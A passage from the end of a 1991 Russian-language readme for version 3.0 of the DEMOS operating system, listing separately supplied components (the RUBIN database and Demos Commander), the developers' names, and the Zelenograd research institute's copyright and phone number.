учетом дальнейших разработок.

POSTCRYPTUM 3.
————– В дистрибутив не входят и поставляются
отдельнo:

a). СУБД “РУБИН”./ с комплектом документации /

b). Интегрированная оболочка “Demos Commander” –
аналог “Norton Commander”.

POSTCRYPTUM 4.
————– Над версией 3.0 ОС ДЕМОС работали:

Юдин К.Е.
Судаков А.В.
Рыжонков К.С.
Брагин Д.Н.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright 1991 by Research Institute “Scientific Centre”,
lab 462/2. All rights reserved.

PHONE:   536-56-42.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
МОСКВА, ЗЕЛЕНОГРАД, НИИ “НАУЧНЫЙ ЦЕНТР”(лаб.462/2),

ТЕЛЕФОН: 536-56-42.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

More to come :D